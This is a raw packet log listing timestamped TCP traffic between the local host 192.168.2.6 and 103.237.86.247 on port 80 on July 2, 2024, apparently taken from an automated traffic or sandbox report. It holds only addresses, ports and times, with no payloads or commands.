Jul 2, 2024 07:48:57.612334967 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.612361908 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.612447977 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.612478018 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.612494946 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.612509012 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.612519026 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.612541914 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.612750053 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.612761974 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.612801075 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.612977982 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613040924 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613051891 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613074064 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.613157034 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613194942 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.613244057 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613256931 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613297939 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.613400936 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613411903 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613421917 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613434076 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613442898 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.613467932 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.613729000 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613740921 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613751888 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613761902 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.613780975 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.613806009 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.614044905 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614113092 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614125013 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614147902 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.614299059 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614309072 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614320993 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614336967 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614340067 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.614370108 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.614543915 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.614583969 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.869905949 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.869936943 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.869968891 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870021105 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870053053 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.870088100 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.870115995 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870213985 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870227098 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870250940 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.870362043 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870373964 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870400906 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.870724916 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870734930 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870745897 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870767117 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.870789051 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.870852947 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870863914 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.870908976 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.871047020 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871059895 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871071100 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871093035 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.871222973 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871236086 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871247053 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871254921 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.871282101 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.871560097 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871572018 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871582985 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871607065 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.871886969 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871898890 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.871921062 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872051954 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872067928 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872082949 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872240067 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872256994 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872268915 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872277021 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872281075 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872292995 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872298002 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872306108 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872325897 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872517109 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872526884 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872538090 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872549057 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872555017 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872562885 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872569084 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872577906 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872612000 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872656107 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872668028 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872678995 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872689962 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872692108 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872701883 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872713089 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
Jul 2, 2024 07:48:57.872714043 CEST | 80 | 49711 | 103.237.86.247 | 192.168.2.6
Jul 2, 2024 07:48:57.872740984 CEST | 49711 | 80 | 192.168.2.6 | 103.237.86.247
                  Jul 2, 2024 07:48:57.873042107 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873075962 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873234034 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873245001 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873255968 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873266935 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873276949 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873281002 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873301983 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873418093 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873430967 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873444080 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873450041 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873478889 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873867035 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873878002 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873914957 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.874924898 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.874960899 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.874972105 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.874994040 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.875159025 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.875171900 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.875194073 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.920675039 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.958405018 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.998753071 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128529072 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128566027 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128577948 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128638029 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128736019 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128747940 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128760099 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128771067 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128787041 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128820896 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128988028 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129000902 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129012108 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129024029 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129048109 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129060030 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129314899 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129328012 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129339933 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129362106 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129375935 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129584074 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129596949 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129607916 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129620075 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129632950 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129636049 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129646063 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129659891 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129667044 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129672050 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129688978 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129724026 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130112886 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130126953 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130137920 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130162954 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130354881 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130373955 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130384922 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130395889 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130403996 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130410910 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130414009 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130424976 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130438089 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130450964 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130461931 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130465031 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130479097 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130492926 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130501986 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131103992 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131115913 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131128073 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131139994 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131151915 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131154060 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131165028 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131179094 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131181002 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131192923 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131201029 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131212950 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131783962 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131797075 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131808043 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131819010 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131829977 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131834030 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131844044 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131855965 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131858110 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131867886 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131876945 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131881952 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131894112 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131897926 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131906033 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131917000 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131923914 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131927967 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131938934 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131977081 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.132702112 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132714033 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132725000 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132736921 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132746935 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.132747889 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132761002 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132771015 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132771969 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.132783890 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132795095 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132806063 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132807970 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.132817984 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.132836103 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.132848978 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.133498907 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133511066 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133521080 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133531094 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133541107 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133543968 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.133552074 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133554935 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.133564949 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133574963 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133586884 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133586884 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.133600950 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133613110 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.133613110 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133626938 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.133630037 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.133652925 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.134365082 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.134377956 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.134387016 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.134398937 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.134408951 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.134412050 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.134418964 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.134429932 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.134449005 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.186134100 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.387532949 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387568951 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387587070 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387729883 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387742996 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387752056 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.387753963 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387768030 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387773991 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.387799025 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.387976885 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.387989044 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388000011 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388014078 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388015985 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388039112 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388206959 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388250113 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388333082 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388345957 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388355970 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388369083 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388381004 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388384104 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388392925 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388403893 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388406038 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388418913 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388428926 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388494968 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388895035 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388906002 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388916969 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388927937 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388943911 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388955116 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.388956070 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.388974905 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389010906 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389250994 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389264107 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389275074 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389286995 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389297962 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389312029 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389314890 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389339924 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389352083 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389712095 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389728069 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389739037 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389749050 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389760017 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389765024 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389774084 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389786005 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389789104 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389803886 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389803886 CEST4971180192.168.2.6103.237.86.247
